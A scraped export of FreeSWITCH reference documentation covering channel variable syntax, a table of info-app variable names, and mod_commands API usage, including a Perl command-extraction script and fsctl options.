so for enterprise bridging/originate. \u0026lt;foo=bar\u0026gt; is only valid at the beginning of a dial string. It will set the same variables on every channel, including all those in an enterprise bridging/originate. [foo=bar] goes before each individual dial string and will set the variable values specified for only this channel. 
ExamplesSet foo variable for all channels implemented and chan=1 will only be set for blah, while chan=2 will only be set for blah2:\n{foo=bar}[chan=1]sofia/default/blah@baz.com,[chan=2]sofia/default/blah2@baz.com Set multiple variables by delimiting with commas:\n[var1=abc,var2=def,var3=ghi]sofia/default/blah@baz.com To have variables in [] override variables in {}, set local_var_clobber=true inside {}. You must also set local_var_clobber=true when you want to override channel variables that have been exported to your b-legs in your dialplan. In this example, the legs for blah1@baz.com and johndoe@example.com would be set to offer SRTP (RTP/SAVP) while janedoe@acme.com would not receive an SRTP offer (she would see RTP/AVP instead):\n{local_var_clobber=true,rtp_secure_media=true}sofia/default/blah1@baz.com|sofia/default/johndoe@example.com|rtp_secure_media=false]sofia/default/janedoe@acme.com Escaping/Redefining Delimiters Commas are the default delimiter inside variable assignment tags. In some cases (like in absolute_codec_string), we may need to define variables whose values contain literal commas that should not be interpreted as delimiters. We can redefine the delimiter for a variable using ^^ followed by the desired delimiter:\n^^;one,two,three;four,five,six;seven,eight,nine To set absolute_codec_string=PCMA@8000h@20i@64000b,PCMU@8000h@20i@64000b,G729@8000h@20i@8000b in a dial string:\n{absolute_codec_string=^^:PCMA@8000h@20i@64000b:PCMU@8000h@20i@64000b:G729@8000h@20i@8000b,leg_time_out=10,process_cdr=b_only} This approach does not work when setting sip_h_, sip_rh_, and sip_ph headers. To pass a comma into the contents of a private header, escape the comma with a backslash:\n{sip_h_X-My-Header=one\\,two\\,three,leg_time_out=10,process_cdr=b_only} Exporting Channel Variables in Bridge Operations Variables from one call leg (A) can be exported to the other call leg (B) by using the export_vars variable. 
Its value is a comma-separated list of variables that should propagate across calls.\n\u0026lt;action application=\u0026quot;set\u0026quot; data=\u0026quot;export_vars=myvar,myvar2,foo,bar\u0026quot;/\u0026gt; To set a variable on the A-leg and add it to the export list, use the export application:\n\u0026lt;action application=\u0026quot;export\u0026quot; data=\u0026quot;myvar=true\u0026quot;/\u0026gt; Using Channel Variables in Dialplan Condition Statements Channel variables can be used in conditions; refer to XML Dialplan Conditions for more information. Some channel variables may not be set during the dialplan parsing phase. See Inline Actions. Custom Channel Variables We are not constrained to the channel variables that FreeSWITCH™, its modules, and applications define. It is possible to set any number of unique channel variables for any purpose. They can also be logged in CDR. The set application can be used to set any channel variable:\n\u0026lt;action application=\u0026quot;set\u0026quot; data=\u0026quot;lead_id=2e4b5966-0aaf-11e8-ba89-0ed5f89f718b\u0026quot;/\u0026gt;\u0026lt;action application=\u0026quot;set\u0026quot; data=\u0026quot;campaign_id=333814\u0026quot;/\u0026gt;\u0026lt;action application=\u0026quot;set\u0026quot; data=\u0026quot;crm_tags=referral new loyal\u0026quot; /\u0026gt; In a command issued via mod_xml_rpc or mod_event_socket:\noriginate {lead_id=2e4b5966-0aaf-11e8-ba89-0ed5f89f718,campaign_id=333814}sofia/mydomain.com/18005551212@1.2.3.4 15555551212 Values with spaces must be enclosed by quotes:\noriginate {crm_tags='referral new loyal'}sofia/mydomain.com/18005551212@1.2.3.4 15555551212 Channel Variable Manipulation Channel variables can be manipulated for varied results. For example, a channel variable could be trimmed to get the first three digits of a phone number. Manipulating Channel Variables discusses this in detail. 
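The ^^ delimiter-redefinition rule from the Escaping/Redefining Delimiters section above can be sketched in a few lines of Python; this is an illustrative reading of the rule, not FreeSWITCH source:

```python
def split_var_value(value: str) -> list[str]:
    """Split a variable value into items, honoring ^^: a value that
    starts with "^^" uses the character right after it as the
    delimiter; otherwise items are comma-separated."""
    if value.startswith("^^") and len(value) > 2:
        delim = value[2]
        return value[3:].split(delim)
    return value.split(",")

# The ^^; example above: semicolons delimit, literal commas survive.
print(split_var_value("^^;one,two,three;four,five,six;seven,eight,nine"))
# ['one,two,three', 'four,five,six', 'seven,eight,nine']
```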
Channel Variable Scope Example Consider this example:\n\u0026lt;extension name=\u0026quot;test\u0026quot; continue=\u0026quot;false\u0026quot;\u0026gt; \u0026lt;condition field=\u0026quot;destination_number\u0026quot; expression=\u0026quot;^test([0-9]+)$\u0026quot;\u0026gt; \u0026lt;action application=\u0026quot;set\u0026quot; data=\u0026quot;fruit=tomato\u0026quot; /\u0026gt; \u0026lt;action application=\u0026quot;export\u0026quot; data=\u0026quot;veggie=tomato\u0026quot; /\u0026gt; \u0026lt;action application=\u0026quot;bridge\u0026quot; data=\u0026quot;{meat=tomato}sofia/gateway/testaccount/1234\u0026quot; /\u0026gt; \u0026lt;/condition\u0026gt;\u0026lt;/extension\u0026gt; Leg A (the channel that called the dial plan) will have these variables set:\nfruit: tomato\nveggie: tomato Leg B (the channel created with sofia/gateway/testaccount/1234) will have these variables set:\nveggie: tomato\nmeat: tomato Accessing Channel Variables in Other Environments In addition to the dialplan, channel variables can be set in other environments as well. In a FreeSWITCH™ module, written in C:\nswitch_channel_set_variable(channel, \u0026quot;name\u0026quot;, \u0026quot;value\u0026quot;);char* result = switch_channel_get_variable(channel, \u0026quot;name\u0026quot;); char* result = switch_channel_get_variable_partner(channel, \u0026quot;name\u0026quot;); In the console (or fs_cli, implemented in mod_commands): uuid_getvar \u0026lt;uuid\u0026gt; \u0026lt;var\u0026gt;, uuid_setvar \u0026lt;uuid\u0026gt; \u0026lt;var\u0026gt; [\u0026lt;value\u0026gt;], uuid_setvar_multi \u0026lt;uuid\u0026gt; \u0026lt;var\u0026gt;=\u0026lt;value\u0026gt;[;\u0026lt;var\u0026gt;=\u0026lt;value\u0026gt;[;\u0026hellip;]] Alternatively, call uuid_dump \u0026lt;uuid\u0026gt; to get all the variables, or use the eval command, adding the prefix variable_ to the key:\neval uuid:\u0026lt;uuid\u0026gt; ${variable_\u0026lt;name\u0026gt;} In an event socket, just extend the above with the api prefix:\napi uuid_getvar \u0026lt;uuid\u0026gt; \u0026lt;var\u0026gt; In Lua, there are several ways to interact with variables. 
In the freeswitch.Session() invocation that creates a new Session object, variables go in square brackets:\ns = freeswitch.Session(\u0026quot;[myname=myvars]sofia/localhost/1003\u0026quot;) With the new Session object s:\nlocal result1 = s:getVariable(\u0026quot;myname\u0026quot;) -- \u0026quot;myvars\u0026quot;\ns:setVariable(\u0026quot;name\u0026quot;, \u0026quot;value\u0026quot;)\nlocal result2 = s:getVariable(\u0026quot;name\u0026quot;) -- \u0026quot;value\u0026quot; Info Application Variable Names (variable_xxxx) Some variables, as shown from the info app, may have variable_ in front of their names. For example, if you pass a header variable called type from the proxy server, it will get displayed as variable_sip_h_type in FreeSWITCH™. To access that variable, you should strip off the variable_, and just do ${sip_h_type}. Other variables shown in the info app are prepended with channel, which should be stripped as well. The table below shows a list of info app variables and the corresponding channel variable names:\nInfo variable name channel variable name Description Channel-State state Current state of the call Channel-State-Number state_number Integer Channel-Name channel_name Channel name Unique-ID uuid uuid of this channel\u0026rsquo;s call leg Call-Direction direction Inbound or Outbound Answer-State state - Channel-Read-Codec-Name read_codec the read codec, i.e. the source codec Channel-Read-Codec-Rate read_rate the source rate Channel-Write-Codec-Name write_codec the destination codec, same as the read codec if not transcoded Channel-Write-Codec-Rate write_rate the destination rate, same as the read rate if not transcoded Caller-Username username . Caller-Dialplan dialplan user dialplan like xml, lua, enum, lcr Caller-Caller-ID-Name caller_id_name . Caller-Caller-ID-Number caller_id_number . 
Caller-ANI ani ANI of caller, frequently the same as caller ID number Caller-ANI-II aniii ANI II Digits (OLI - Originating Line Information), if available. Refer to: http://www.nanpa.com/number_resource_info/ani_ii_digits.html Caller-Network-Addr network_addr IP address of calling party Caller-Destination-Number destination_number Destination (dialed) number Caller-Unique-ID uuid This channel\u0026rsquo;s uuid Caller-Source source Source module, i.e. mod_sofia, mod_openzap, etc. Caller-Context context Dialplan context Caller-RDNIS rdnis Redirected DNIS info. See mod_dptools: transfer application Caller-Channel-Name channel_name . Caller-Profile-Index profile_index . Caller-Channel-Created-Time created_time . Caller-Channel-Answered-Time answered_time . Caller-Channel-Hangup-Time hangup_time . Caller-Channel-Transfer-Time transfer_time . Caller-Screen-Bit screen_bit . Caller-Privacy-Hide-Name privacy_hide_name . Caller-Privacy-Hide-Number privacy_hide_number This variable tells you if the inbound call is asking for CLIR[Calling Line ID presentation Restriction] (either with anonymous method or Privacy:id method) initial_callee_id_name Sets the callee id name during the 183. This allows the phone to see a name of who they are calling prior to the phone being answered. An example of setting this to the caller id name of the number being dialled: variable_sip_received_ip sip_received_ip . variable_sip_received_port sip_received_port . variable_sip_authorized sip_authorized . variable_sip_mailbox sip_mailbox . variable_sip_auth_username sip_auth_username . variable_sip_auth_realm sip_auth_realm . variable_mailbox mailbox . variable_user_name user_name . variable_domain_name domain_name . variable_record_stereo record_stereo . variable_accountcode accountcode Accountcode for the call. This is an arbitrary value. It can be defined in the user variables in the directory, or it can be set/modified from dialplan. 
The accountcode may be used to force a specific CDR CSV template for the call. variable_user_context user_context . variable_effective_caller_id_name effective_caller_id_name . variable_effective_caller_id_number effective_caller_id_number . variable_caller_domain caller_domain . variable_sip_from_user sip_from_user . variable_sip_from_uri sip_from_uri . variable_sip_from_host sip_from_host . variable_sip_from_user_stripped sip_from_user_stripped . variable_sip_from_tag sip_from_tag . variable_sofia_profile_name sofia_profile_name . variable_sofia_profile_domain_name sofia_profile_domain_name . variable_sip_full_route sip_full_route The complete contents of the Route: header. variable_sip_full_via sip_full_via The complete contents of the Via: header. variable_sip_full_from sip_full_from The complete contents of the From: header. variable_sip_full_to sip_full_to The complete contents of the To: header. variable_sip_req_params sip_req_params . variable_sip_req_user sip_req_user . variable_sip_req_uri sip_req_uri . variable_sip_req_host sip_req_host . variable_sip_to_params sip_to_params . variable_sip_to_tag sip_to_tag . variable_sip_to_user sip_to_user . variable_sip_to_uri sip_to_uri . variable_sip_to_host sip_to_host . variable_sip_contact_params sip_contact_params . variable_sip_contact_user sip_contact_user . variable_sip_contact_port sip_contact_port . variable_sip_contact_uri sip_contact_uri . variable_sip_contact_host sip_contact_host . variable_sip_invite_domain sip_invite_domain . variable_channel_name channel_name . variable_sip_call_id sip_call_id SIP header Call-ID variable_sip_user_agent sip_user_agent . variable_sip_via_host sip_via_host . variable_sip_via_port sip_via_port . variable_sip_via_rport sip_via_rport . variable_presence_id presence_id . variable_sip_h_P-Key-Flags sip_h_p-key-flags This will contain the optional P-Key-Flags header(s) that may be received from calling endpoint. 
variable_switch_r_sdp switch_r_sdp The whole SDP received from calling endpoint. variable_remote_media_ip remote_media_ip . variable_remote_media_port remote_media_port . variable_write_codec write_codec . variable_write_rate write_rate . variable_endpoint_disposition endpoint_disposition . variable_dialed_ext dialed_ext . variable_transfer_ringback transfer_ringback . variable_call_timeout call_timeout . variable_hangup_after_bridge hangup_after_bridge . variable_continue_on_fail continue_on_fail . variable_dialed_user dialed_user . variable_dialed_domain dialed_domain . variable_sip_redirect_contact_user_0 sip_redirect_contact_user_0 . variable_sip_redirect_contact_host_0 sip_redirect_contact_host_0 . variable_sip_h_Referred-By sip_h_referred-by . variable_sip_refer_to sip_refer_to The full SIP URI received from a SIP Refer-To: response variable_max_forwards max_forwards . variable_originate_disposition originate_disposition . variable_read_codec read_codec . variable_read_rate read_rate . variable_open open . variable_use_profile use_profile . variable_current_application current_application . variable_ep_codec_string ep_codec_string This variable is only available if late negotiation is enabled on the profile. It\u0026rsquo;s a readable string containing all the codecs proposed by the calling endpoint. This can be easily parsed in the dialplan. variable_rtp_disable_hold rtp_disable_hold This variable when set will disable the hold feature of the phone. variable_sip_acl_authed_by sip_acl_authed_by This variable holds what ACL rule allowed the call. variable_curl_response_data curl_response_data This variable stores the output from the last curl made. variable_drop_dtmf drop_dtmf Set on a channel to drop DTMF events on the way out. variable_drop_dtmf_masking_file drop_dtmf_masking_file If drop_dtmf is true play specified file for every tone received. 
variable_drop_dtmf_masking_digits drop_dtmf_masking_digits If drop_dtmf is true play specified tone for every tone received. sip_codec_negotiation sip_codec_negotiation sip_codec_negotiation is basically a channel variable equivalent of inbound-codec-negotiation.sip_codec_negotiation accepts \u0026ldquo;scrooge\u0026rdquo; \u0026amp; \u0026ldquo;greedy\u0026rdquo; as values.This means you can change codec negotiation on a per call basis. Caller-Callee-ID-Name - - Caller-Callee-ID-Number - - Caller-Channel-Progress-Media-Time - - Caller-Channel-Progress-Time - - Caller-Direction - - Caller-Profile-Created-Time profile_created - Caller-Transfer-Source - - Channel-Call-State - - Channel-Call-UUID - - Channel-HIT-Dialplan - - Channel-Read-Codec-Bit-Rate - - Channel-Write-Codec-Bit-Rate - - Core-UUID - - Event-Calling-File - - Event-Calling-Function - - Event-Calling-Line-Number - - Event-Date-GMT - - Event-Date-Local - - Event-Date-Timestamp - - Event-Name - - Event-Sequence - - FreeSWITCH-Hostname - - FreeSWITCH-IPv4 - - FreeSWITCH-IPv6 - - FreeSWITCH-Switchname - - Hunt-ANI - - Hunt-Callee-ID-Name - - Hunt-Callee-ID-Number - - Hunt-Caller-ID-Name - - Hunt-Caller-ID-Number - - Hunt-Channel-Answered-Time - - Hunt-Channel-Created-Time - - Hunt-Channel-Hangup-Time - - Hunt-Channel-Name - - Hunt-Channel-Progress-Media-Time - - Hunt-Channel-Progress-Time - - Hunt-Channel-Transfer-Time - - Hunt-Context - - Hunt-Destination-Number - - Hunt-Dialplan - - Hunt-Direction - - Hunt-Network-Addr - - Hunt-Privacy-Hide-Name - - Hunt-Privacy-Hide-Number - - Hunt-Profile-Created-Time profile_created - Hunt-Profile-Index - - Hunt-RDNIS - - Hunt-Screen-Bit - - Hunt-Source - - Hunt-Transfer-Source - - Hunt-Unique-ID - - Hunt-Username - - Presence-Call-Direction - - variable_DIALSTATUS - - variable_absolute_codec_string - - variable_advertised_media_ip - - variable_answersec variable_answermsec variable_answerusec variable_billsec variable_billmsec variable_billusec variable_bridge_channel 
- - variable_bridge_hangup_cause - - variable_bridge_uuid - - variable_call_uuid - - variable_current_application_response - - variable_direction - - variable_duration variable_mduration variable_uduration variable_inherit_codec - - variable_is_outbound - - variable_last_bridge_to - - variable_last_sent_callee_id_name - - variable_last_sent_callee_id_number - - variable_local_media_ip - - variable_local_media_port - - variable_number_alias - - variable_originate_early_media - - variable_originating_leg_uuid - - variable_originator - - variable_originator_codec - - variable_outbound_caller_id_number - - variable_progresssec variable_progressmsec variable_progressusec variable_progress_mediasec variable_progress_mediamsec variable_progress_mediausec variable_recovery_profile_name - - variable_rtp_use_ssrc - - variable_session_id - - variable_sip_2833_recv_payload - - variable_sip_2833_send_payload - - variable_sip_P-Asserted-Identity - - variable_sip_Privacy - - variable_sip_audio_recv_pt - - variable_sip_cid_type - - variable_sip_cseq - - variable_sip_destination_url - - variable_sip_from_display sip_from_display \u0026lsquo;User\u0026rsquo; element of SIP From: line variable_sip_from_port - - variable_sip_gateway - - variable_sip_gateway_name - - variable_sip_h_P-Charging-Vector - - variable_sip_local_network_addr - - variable_sip_local_sdp_str - - variable_sip_network_ip - - variable_sip_network_port - - variable_sip_number_alias - - variable_sip_outgoing_contact_uri - - variable_sip_ph_P-Charging-Vector - - variable_sip_profile_name - - variable_sip_recover_contact - - variable_sip_recover_via - - variable_sip_reply_host - - variable_sip_reply_port - - variable_sip_req_port - - variable_sip_to_port - - variable_sip_use_codec_name - - variable_sip_use_codec_ptime - - variable_sip_use_codec_rate - - variable_sip_use_pt - - variable_sip_via_protocol - - variable_switch_m_sdp - - variable_transfer_history - - variable_transfer_source - - variable_uuid - - 
variable_waitsec variable_waitmsec variable_waitusec ","permalink":"https://wdd.js.org/freeswitch/channel-var-list/","summary":"About Channel variables are used to manipulate dialplan execution, to control call progress, and to provide options to applications. They play a pervasive role, as FreeSWITCH™ frequently consults channel variables as a way to customize processing prior to a channel\u0026rsquo;s creation, during call progress, and after the channel hangs up.  Click here to expand Table of Contents Variable Expansion We rely on variable expansion to create flexible, reusable dialplans:","title":"通道变量列表"},{"content":"\nUsage CLI See below. API/Event Interfaces mod_event_socket mod_erlang_event mod_xml_rpc Scripting Interfaces mod_perl mod_v8 mod_python mod_lua From the Dialplan An API command can be called from the dialplan. Example:Invoke API Command From DialplanOther examples:Other Dialplan API Command ExamplesAPI commands with multiple arguments usually have the arguments separated by a space:Multiple Arguments\nDialplan UsageIf you are calling an API command from the dialplan make absolutely certain that there isn\u0026rsquo;t already a dialplan application that gives you the functionality you are looking for. See mod_dptools for a list of dialplan applications, they are quite extensive. Extraction Script Mitch Capper wrote a Perl script to extract commands from mod_commands source code. 
It\u0026rsquo;s tailored specifically for extracting from mod_commands but should work for most other files. Extraction Perl Script#!/usr/bin/perluse strict;open (fl,\u0026quot;src/mod/applications/mod_commands/mod_commands.c\u0026quot;);my $cont;{ local $/ = undef; $cont = \u0026lt;fl\u0026gt;;}close fl;my %DEFINES;my $reg_define = qr/[A-Za-z0-9_]+/;my $reg_function = qr/[A-Za-z0-9_]+/;my $reg_string_or_define = qr/(?:(?:$reg_define)|(?:\u0026quot;[^\u0026quot;]*\u0026quot;))/;\n#load defineswhile ($cont =~ / ^\\s* #define \\s+ ($reg_define) \\s+ \u0026quot;([^\u0026quot;]*)\u0026quot; /mgx){ warn \u0026quot;$1 is #defined multiple times\u0026quot; if ($DEFINES{$1}); $DEFINES{$1} = $2;}\nsub resolve_str_or_define($){ my ($str) = @_; if ($str =~ s/^\u0026quot;// \u0026amp;\u0026amp; $str =~ s/\u0026quot;$//){ #if starts and ends with a quote strip them off and return the str return $str; } warn \u0026quot;Unable to resolve define: $str\u0026quot; if (! $DEFINES{$str}); return $DEFINES{$str};}#parse commandswhile ($cont =~ / SWITCH_ADD_API \\s* ( ([^,]+) #interface $1 ,\\s* ($reg_string_or_define) # command $2 ,\\s* ($reg_string_or_define) # command description $3 ,\\s* ($reg_function) # function $4 ,\\s* ($reg_string_or_define) # usage $5 \\s*); /sgx){ my ($interface,$command,$descr,$function,$usage) = ($1,$2,$3,$4,$5); $command = resolve_str_or_define($command); $descr = resolve_str_or_define($descr); $usage = resolve_str_or_define($usage); warn \u0026quot;Found a not command interface of: $interface for command: $command\u0026quot; if ($interface ne \u0026quot;commands_api_interface\u0026quot;); print \u0026quot;$command -- $descr -- $usage\\n\u0026quot;;} Core Commands Implemented in http://fisheye.freeswitch.org/browse/freeswitch.git/src/mod/applications/mod_commands/mod_commands.c Format of Returned Data Results of some status and listing commands are presented in comma delimited lists by default. 
Data returned from some modules may also contain commas, making it difficult to automate result processing. They may be retrieved in an XML format by appending the string \u0026quot;as xml\u0026quot; to the end of the command string, or as JSON using \u0026quot;as json\u0026quot;, or with the delimiter changed from comma to something else using \u0026quot;as delim |\u0026quot;. acl Compare an IP to an Access Control List.Usage: acl \u0026lt;ip\u0026gt; \u0026lt;list_name\u0026gt; alias Alias: a means to save some keystrokes on commonly used commands.Usage: alias add \u0026lt;alias\u0026gt; \u0026lt;command\u0026gt; | del [\u0026lt;alias\u0026gt;|*]Example:freeswitch\u0026gt; alias add reloadall reloadacl reloadxml+OKfreeswitch\u0026gt; alias add unreg sofia profile internal flush_inbound_reg+OKYou can add aliases that persist across restarts using the stickyadd argument:freeswitch\u0026gt; alias stickyadd reloadall reloadacl reloadxml+OKOnly really works from the console, not fs_cli. bgapi Execute an API command in a thread.Usage: bgapi \u0026lt;command\u0026gt; [ \u0026lt;arg\u0026gt; ] complete Complete.Usage: complete add \u0026lt;word\u0026gt;|del [\u0026lt;word\u0026gt;|*] cond Evaluate a conditional expression.Usage: cond \u0026lt;expr\u0026gt; ? \u0026lt;true val\u0026gt; : \u0026lt;false val\u0026gt; Operators supported in \u0026lt;expr\u0026gt; are:\n== (equal to) != (not equal to) \u0026gt; (greater than) \u0026gt;= (greater than or equal to) \u0026lt; (less than) \u0026lt;= (less than or equal to) How are values compared?\ntwo strings are compared as strings two numbers are compared as numbers a string and a number are compared as strlen(string) and the number For example, foo == 3 evaluates to true, and foo == three to false.\nExamples\nExample:Return true if the first value is greater than the second:cond 5 \u0026gt; 3 ? true : false\ntrue Example in dialplan:Slightly more complex example:\nNote about syntaxThe whitespace around the question mark and colon is required since FS-5945. Before that, it was optional. If the spaces are missing, the cond function will return -ERR. domain_exists Check if a FreeSWITCH domain exists.Usage: domain_exists \u0026lt;domain\u0026gt; eval Eval (noop). Evaluates a string, expands variables. 
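The cond comparison rules above (strings vs. numbers) can be mirrored in a short Python sketch, which makes the foo == 3 example concrete. This is illustrative only, not how FreeSWITCH implements cond:

```python
def cond_eq(a: str, b: str) -> bool:
    """Sketch of the cond equality rule described above: two numbers
    compare numerically, two strings compare as strings, and a string
    against a number compares len(string) against the number."""
    def num(s):
        try:
            return float(s)
        except ValueError:
            return None
    na, nb = num(a), num(b)
    if na is not None and nb is not None:
        return na == nb           # two numbers
    if na is None and nb is None:
        return a == b             # two strings
    if na is None:
        return len(a) == nb       # string vs number: strlen(a) == b
    return na == len(b)           # number vs string: a == strlen(b)

print(cond_eq("foo", "3"))      # True: strlen("foo") == 3
print(cond_eq("foo", "three"))  # False: plain string comparison
```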
Those variables that are set only during a call session require the uuid of the desired session or else return \u0026quot;-ERR no reply\u0026quot;.Usage: eval [uuid:\u0026lt;uuid\u0026gt; ]\u0026lt;expression\u0026gt;Examples:eval ${domain}\n10.15.0.94\neval Hello, World!\nHello, World!\neval uuid:e72aff5c-6838-49a8-98fb-84c90ad840d9 ${channel-state}\nCS_EXECUTE expand Execute an API command with variable expansion.Usage: expand [uuid:\u0026lt;uuid\u0026gt; ]\u0026lt;command\u0026gt; Example:expand originate sofia/internal/1001%${domain} 9999In this example the value of ${domain} is expanded. If the domain were, for example, \u0026quot;192.168.1.1\u0026quot; then this command would be executed:originate sofia/internal/1001%192.168.1.1 9999 fsctl Send control messages to FreeSWITCH.USAGE: fsctl [ api_expansion [on|off] | calibrate_clock | debug_level [level] | debug_sql | default_dtmf_duration [n] | flush_db_handles | hupall | last_sps | loglevel [level] | max_dtmf_duration [n] | max_sessions [n] | min_dtmf_duration [n] | min_idle_cpu [d] | pause [inbound|outbound] | pause_check [inbound|outbound] | ready_check | reclaim_mem | recover | resume [inbound|outbound] | save_history | send_sighup | shutdown [cancel|elegant|asap|now|restart] | shutdown_check | sps | sps_peak_reset | sql [start] | sync_clock | sync_clock_when_idle | threaded_system_exec | verbose_events [on|off] ]\nfsctl arguments api_expansion Usage: fsctl api_expansion [on|off]Toggles API expansion. With it off, no API functions can be expanded inside channel variables like ${show channels}. This is a specific security mode that is not often used. calibrate_clock Usage: fsctl calibrate_clockRuns an algorithm to compute how long it actually must sleep in order to sleep for a true 1ms. It\u0026rsquo;s only useful in older kernels that don\u0026rsquo;t have timerfd. In those older kernels FS auto detects that it needs to perform that computation. This command just repeats the calibration. debug_level Usage: fsctl debug_level [level]Set the amount of debug information that will be posted to the log. 
1 is less verbose while 9 is more verbose. Additional debug messages will be posted at the ALERT loglevel.\n0 - fatal errors, panic\n1 - critical errors, minimal progress at subsystem level\n2 - non-critical errors\n3 - warnings, progress messages\n5 - signaling protocol actions (incoming packets, \u0026hellip;)\n7 - media protocol actions (incoming packets, \u0026hellip;)\n9 - entering/exiting functions, very verbatim progress\ndebug_sql Usage: fsctl debug_sqlToggle core SQL debugging messages on or off each time this command is invoked. Use with caution on busy systems. In order to see all messages issue the \u0026quot;loglevel debug\u0026quot; command on the fs_cli interface. default_dtmf_duration Usage: fsctl default_dtmf_duration [int]int = number of clock ticksExample:fsctl default_dtmf_duration 2000This example sets the default_dtmf_duration switch parameter to 250ms. The number is specified in clock ticks (CT) where duration (milliseconds) = CT / 8 or CT = duration * 8. The default_dtmf_duration specifies the DTMF duration to use on originated DTMF events or on events that are received without a duration specified. This value is bounded on the lower end by min_dtmf_duration and on the upper end by max_dtmf_duration. So max_dtmf_duration \u0026gt;= default_dtmf_duration \u0026gt;= min_dtmf_duration. This value can be set persistently in switch.conf.xml. To check the current value:fsctl default_dtmf_duration 0FS recognizes a duration of 0 as a status check. Instead of setting the value to 0, it simply returns the current value. flush_db_handles Usage: fsctl flush_db_handlesFlushes cached database handles from the core db handlers. FreeSWITCH reuses db handles whenever possible, but a heavily loaded FS system can accumulate a large number of db handles during peak periods while FS continues to allocate new db handles to service new requests in a FIFO manner. 
\u0026quot;fsctl flush_db_handles\u0026quot; closes db connections that are no longer needed to avoid exceeding connections to the database server. hupall Usage: fsctl hupall \u0026lt;clearing_type\u0026gt; \u0026lt;chan_var_name\u0026gt; \u0026lt;chan_var_value\u0026gt; Disconnect existing calls to a destination and post a clearing cause.For example, to kill an active call with normal clearing and the destination being extension 1000:fsctl hupall normal_clearing dialed_ext 1000 last_sps Usage: fsctl last_spsQuery the actual sessions-per-second.fsctl last_sps+OK last sessions per second: 723987253 (Your mileage might vary.) loglevel Usage: fsctl loglevel [level]Filter how much detail the log messages will contain when displayed on the fs_cli interface. See mod_console for legal values of \u0026quot;level\u0026quot; and further discussion.The available loglevels can be specified by number or name:\n0 - CONSOLE\n1 - ALERT\n2 - CRIT\n3 - ERR\n4 - WARNING\n5 - NOTICE\n6 - INFO\n7 - DEBUG max_sessions Usage: fsctl max_sessions [int]Set how many simultaneous call sessions FS will allow. This value can be ascertained by load testing, but is affected by processor speed and quantity, network and disk bandwidth, choice of codecs, and other factors. See switch.conf.xml for the persistent setting max-sessions. max_dtmf_duration Usage: fsctl max_dtmf_duration [int]Default = 192000 clock ticksExample:fsctl max_dtmf_duration 80000This example sets the max_dtmf_duration switch parameter to 10,000ms (10 seconds). The integer is specified in clock ticks (CT) where CT / 8 = ms. The max_dtmf_duration caps the playout of a DTMF event at the specified duration. Events exceeding this duration will be truncated to this duration. You cannot configure a duration that exceeds this setting. This setting can be lowered, but cannot exceed 192000 (the default). This setting cannot be set lower than min_dtmf_duration. 
This setting can be set persistently in switch.conf.xml as max-dtmf-duration.To query the current value:fsctl max_dtmf_duration 0FreeSWITCH recognizes a duration of 0 as a status check. Instead of setting the value to 0, it simply returns the current value. min_dtmf_duration Usage: fsctl min_dtmf_duration [int]Default = 400 clock ticksExample:fsctl min_dtmf_duration 800This example sets the min_dtmf_duration switch parameter to 100ms. The integer is specified in clock ticks (CT) where CT / 8 = ms. The min_dtmf_duration specifies the minimum DTMF duration to use on outgoing events. Events shorter than this will be increased in duration to match min_dtmf_duration. You cannot configure a DTMF duration on a profile that is less than this setting. You may increase this value, but cannot set it lower than 400 (the default). This value cannot exceed max_dtmf_duration. This setting can be set persistently in switch.conf.xml as min-dtmf-duration.It is worth noting that many devices squelch in-band DTMF when sending RFC 2833. Devices that squelch in-band DTMF have a certain reaction time and clamping time which can sometimes reach as high as 40ms, though most can do it in less than 20ms. As the shortness of your DTMF event duration approaches this clamping threshold, the risk of your DTMF being ignored as a squelched event increases. If your call is always IP-IP the entire route, this is likely not a concern. However, when your call is sent to the PSTN, the RFC 2833 DTMF events must be encoded in the audio stream. This means that other devices down the line (possibly a PBX or IVR that you are calling) might not hear DTMF tones that are long enough to decode and so will ignore them entirely. For this reason, it is recommended that you do not send DTMF events shorter than 80ms.Checking the current value:fsctl min_dtmf_duration 0FreeSWITCH recognizes a duration of 0 as a status check. Instead of setting the value to 0, it simply returns the current value. 
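The clock-tick arithmetic shared by default_dtmf_duration, max_dtmf_duration, and min_dtmf_duration above (ms = CT / 8, i.e. CT = ms * 8 at the 8 kHz reference clock) is easy to check before issuing fsctl. A small Python sketch:

```python
def ms_to_ticks(ms: int) -> int:
    """Convert milliseconds to clock ticks (CT = ms * 8)."""
    return ms * 8

def ticks_to_ms(ticks: int) -> int:
    """Convert clock ticks to milliseconds (ms = CT / 8)."""
    return ticks // 8

print(ms_to_ticks(250))     # 2000, as in: fsctl default_dtmf_duration 2000
print(ticks_to_ms(80000))   # 10000 ms, the max_dtmf_duration example
print(ticks_to_ms(192000))  # 24000 ms, the 192000-tick default ceiling
print(ticks_to_ms(400))     # 50 ms, the 400-tick min_dtmf_duration default
```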
min_idle_cpu Usage: fsctl min_idle_cpu [int]Allocates the minimum percentage of CPU idle time available to other processes to prevent FreeSWITCH from consuming all available CPU cycles.Example:fsctl min_idle_cpu 10This allocates a minimum of 10% CPU idle time which is not available for processing by FS. Once FS reaches 90% CPU consumption it will respond with cause code 503 to additional SIP requests until its own usage drops below 90%, while reserving that last 10% for other processes on the machine. pause Usage: fsctl pause [inbound|outbound]Pauses the ability to receive inbound or originate outbound calls, or both directions if the keyword is omitted. Executing fsctl pause inbound will also prevent registration requests from being processed. Executing fsctl pause outbound will result in the Critical log message \u0026ldquo;The system cannot create any outbound sessions at this time\u0026rdquo; in the FS log.Use resume with the corresponding argument to restore normal operation. pause_check Usage: fsctl pause_check [inbound|outbound]Returns true if the specified mode is active.Examples:fsctl pause_check inboundtrueindicates that inbound calls and registrations are paused. Use fsctl resume inbound to restore normal operation.fsctl pause_checktrueindicates that both inbound and outbound sessions are paused. Use fsctl resume to restore normal operation. ready_check Usage: fsctl ready_checkReturns true if the system is in the ready state, as opposed to awaiting an elegant shutdown or other not-ready state. reclaim_mem Usage: fsctl reclaim_mem recover Usage: fsctl recoverSends an endpoint–specific recover command to each channel detected as recoverable. This replaces “sofia recover” and makes it possible to have multiple endpoints besides SIP implement recovery. 
